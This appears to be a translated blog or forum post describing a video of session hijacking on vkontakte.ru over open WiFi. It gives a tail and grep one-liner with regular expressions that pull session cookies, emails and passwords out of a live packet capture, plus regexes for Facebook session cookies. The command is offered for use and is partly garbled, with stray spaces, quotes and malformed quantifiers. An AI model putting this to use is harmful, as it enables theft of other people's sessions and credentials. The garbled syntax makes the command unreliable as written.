Interception of real-time cookies in open WiFi networks

The video shows a session hijacking vkontakte.ru, which for some reason still does not use authorization with https and transmits passwords in clear text.
The traffic dump is collected by the kismac program in the libpcap format and is simultaneously parsed with a grep using regular expressions, which allows you to display all interesting cookies and passwords in real time. It does not use any packet analyzers.

regexp to intercept vkontakte.ru:
')
tail -F pcap. file | cat | grep -aEo "remixsid = [0-9a-f] + | l = [0-9] {3.12} | p = [0-9a-f] {36} | email = [^ &] + & pass = [^] + ”

for facebook:

c_user = [0-9] + | sid = [0-9] {1,5} | xs = [0-9a-f] {32}

A similar construction will work with the dump collected by using airdump-ng.